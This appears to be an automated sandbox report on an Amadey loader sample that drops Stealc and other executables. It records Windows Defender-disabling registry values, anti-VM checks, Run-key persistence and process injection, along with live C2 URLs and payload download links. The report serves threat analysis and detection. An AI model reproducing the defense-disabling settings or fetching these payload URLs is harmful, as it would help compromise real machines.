amadey | 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	5685e027dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	5685e027dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	5685e027dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	5685e027dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	5685e027dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	5685e027dd.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	71b8acff7f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e1ae7b97ca.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5685e027dd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e1ae7b97ca.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5685e027dd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	71b8acff7f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	71b8acff7f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e1ae7b97ca.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5685e027dd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	skotes.exe

Executes dropped EXE 7 IoCs

pid	Process
2628	skotes.exe
2748	skotes.exe
1296	71b8acff7f.exe
3740	e1ae7b97ca.exe
4252	5685e027dd.exe
3296	skotes.exe
1660	skotes.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	71b8acff7f.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	e1ae7b97ca.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	5685e027dd.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	skotes.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	5685e027dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	5685e027dd.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\71b8acff7f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004745001\\71b8acff7f.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e1ae7b97ca.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004746001\\e1ae7b97ca.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5685e027dd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004748001\\5685e027dd.exe"	skotes.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
540	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
2628	skotes.exe
2748	skotes.exe
1296	71b8acff7f.exe
3740	e1ae7b97ca.exe
4252	5685e027dd.exe
3296	skotes.exe
1660	skotes.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4572	1296	WerFault.exe	105
2896	1296	WerFault.exe	105

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	71b8acff7f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e1ae7b97ca.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5685e027dd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
540	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
540	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
2628	skotes.exe
2628	skotes.exe
2748	skotes.exe
2748	skotes.exe
1296	71b8acff7f.exe
1296	71b8acff7f.exe
3740	e1ae7b97ca.exe
3740	e1ae7b97ca.exe
4252	5685e027dd.exe
4252	5685e027dd.exe
4252	5685e027dd.exe
4252	5685e027dd.exe
4252	5685e027dd.exe
3296	skotes.exe
3296	skotes.exe
1660	skotes.exe
1660	skotes.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4252	5685e027dd.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
540	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 540 wrote to memory of 2628	540	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe	88
PID 540 wrote to memory of 2628	540	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe	88
PID 540 wrote to memory of 2628	540	766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe	88
PID 2628 wrote to memory of 1296	2628	skotes.exe	105
PID 2628 wrote to memory of 1296	2628	skotes.exe	105
PID 2628 wrote to memory of 1296	2628	skotes.exe	105
PID 2628 wrote to memory of 3740	2628	skotes.exe	107
PID 2628 wrote to memory of 3740	2628	skotes.exe	107
PID 2628 wrote to memory of 3740	2628	skotes.exe	107
PID 2628 wrote to memory of 4472	2628	skotes.exe	108
PID 2628 wrote to memory of 4472	2628	skotes.exe	108
PID 2628 wrote to memory of 4472	2628	skotes.exe	108
PID 2628 wrote to memory of 4252	2628	skotes.exe	114
PID 2628 wrote to memory of 4252	2628	skotes.exe	114
PID 2628 wrote to memory of 4252	2628	skotes.exe	114

C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
"C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:540
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Users\Admin\AppData\Local\Temp\1004745001\71b8acff7f.exe
    "C:\Users\Admin\AppData\Local\Temp\1004745001\71b8acff7f.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1296
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1468
      4⤵
      Program crash
      PID:2896
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1508
      4⤵
      Program crash
      PID:4572
- - C:\Users\Admin\AppData\Local\Temp\1004746001\e1ae7b97ca.exe
    "C:\Users\Admin\AppData\Local\Temp\1004746001\e1ae7b97ca.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3740
- - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
    3⤵
    PID:4472
- - C:\Users\Admin\AppData\Local\Temp\1004748001\5685e027dd.exe
    "C:\Users\Admin\AppData\Local\Temp\1004748001\5685e027dd.exe"
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Windows security modification
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4252

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1296 -ip 1296
1⤵
PID:3584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1296 -ip 1296
1⤵
PID:4652

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3296

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1660

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR
DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

106.209.201.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

106.209.201.84.in-addr.arpa

IN PTR

Response
DNS

106.209.201.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

106.209.201.84.in-addr.arpa

IN PTR
DNS

20.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.160.190.20.in-addr.arpa

IN PTR

Response
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 08 Nov 2024 03:04:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 08 Nov 2024 03:04:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 08 Nov 2024 03:05:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 08 Nov 2024 03:05:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 08 Nov 2024 03:05:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 08 Nov 2024 03:05:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

43.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.113.215.185.in-addr.arpa

IN PTR

Response
GET

http://185.215.113.16/luma/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /luma/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 08 Nov 2024 03:05:00 GMT
Content-Type: application/octet-stream
Content-Length: 3152896
Last-Modified: Fri, 08 Nov 2024 02:43:37 GMT
Connection: keep-alive
ETag: "672d7ad9-301c00"
Accept-Ranges: bytes
GET

http://185.215.113.16/steam/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /steam/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 08 Nov 2024 03:05:26 GMT
Content-Type: application/octet-stream
Content-Length: 2158592
Last-Modified: Fri, 08 Nov 2024 02:43:50 GMT
Connection: keep-alive
ETag: "672d7ae6-20f000"
Accept-Ranges: bytes
GET

http://185.215.113.16/off/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /off/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 08 Nov 2024 03:05:36 GMT
Content-Type: application/octet-stream
Content-Length: 2828800
Last-Modified: Fri, 08 Nov 2024 02:26:35 GMT
Connection: keep-alive
ETag: "672d76db-2b2a00"
Accept-Ranges: bytes
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

16.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.113.215.185.in-addr.arpa

IN PTR

Response
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR
DNS

197.87.175.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.87.175.4.in-addr.arpa

IN PTR

Response
DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR

Response
DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR
DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR
DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR
DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR
DNS

presticitpo.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

presticitpo.store

IN A

Response
DNS

crisiwarny.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

crisiwarny.store

IN A

Response
DNS

fadehairucw.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

fadehairucw.store

IN A

Response
DNS

thumbystriw.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

thumbystriw.store

IN A

Response
DNS

thumbystriw.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

thumbystriw.store

IN A
DNS

necklacedmny.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

necklacedmny.store

IN A
DNS

necklacedmny.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

necklacedmny.store

IN A
DNS

necklacedmny.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

necklacedmny.store

IN A
DNS

necklacedmny.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

necklacedmny.store

IN A
DNS

necklacedmny.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

necklacedmny.store

IN A
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
GET

http://185.215.113.206/

e1ae7b97ca.exe

Remote address:

185.215.113.206:80

Request

GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 08 Nov 2024 03:05:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

e1ae7b97ca.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAEGCGCGIEGDHIDHJJEH
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 08 Nov 2024 03:05:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

206.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.113.215.185.in-addr.arpa

IN PTR

Response
DNS

founpiuer.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

founpiuer.store

IN A

Response

founpiuer.store

IN A

104.21.5.155

founpiuer.store

IN A

172.67.133.135
DNS

founpiuer.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

founpiuer.store

IN A
DNS

founpiuer.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

founpiuer.store

IN A
DNS

founpiuer.store

71b8acff7f.exe

Remote address:

8.8.8.8:53

Request

founpiuer.store

IN A
DNS

75.117.19.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

75.117.19.2.in-addr.arpa

IN PTR

Response

75.117.19.2.in-addr.arpa

IN PTR

a2-19-117-75deploystaticakamaitechnologiescom
DNS

75.117.19.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

75.117.19.2.in-addr.arpa

IN PTR
POST

https://founpiuer.store/api

71b8acff7f.exe

Remote address:

104.21.5.155:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: founpiuer.store

Response

HTTP/1.1 403 Forbidden

Date: Fri, 08 Nov 2024 03:05:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TI%2FPT04%2FWP%2Bocu2N6gxCblweQnhVwYrt23yYjQU%2Frole4AvDddc6%2BdVpJiN5KNu79AbjZc7R1CrcvHBZWiw%2BgFNLyjnEf4veR1f2C6AK13qoKZI%2B%2F6tuMyATA4ACFwUqezI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8df257b27aebbda0-LHR
POST

https://founpiuer.store/api

71b8acff7f.exe

Remote address:

104.21.5.155:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=Hl5sv1NETPETgsrAnXBkc1LI.ccTVaYKai9EgCsvnsg-1731035138-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: founpiuer.store

Response

HTTP/1.1 200 OK

Date: Fri, 08 Nov 2024 03:05:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=itv2q58qggv27129205rms8gdp; expires=Mon, 03-Mar-2025 20:52:18 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2s6fLTd07wIRITiCZUTxPBNXZr1%2FWaBZIi5qfgaCuzymsBWFvyL9cwyOHviHYeGbrV8idukv4I2Gg0iKWrL1ifYuV1j9Uo7FTgEJj%2FIHpSzYraiKAngzXEBPEft7COvQ1c%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8df257b32b57bda0-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=49524&sent=14&recv=13&lost=0&retrans=0&sent_bytes=8460&recv_bytes=1065&delivery_rate=188472&cwnd=257&unsent_bytes=0&cid=a817319027210647&ts=383&x=0"
DNS

155.5.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.5.21.104.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response

185.215.113.43:80

http://185.215.113.43/Zu7JuNko/index.php

http

skotes.exe

2.8kB
3.7kB
27
19

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

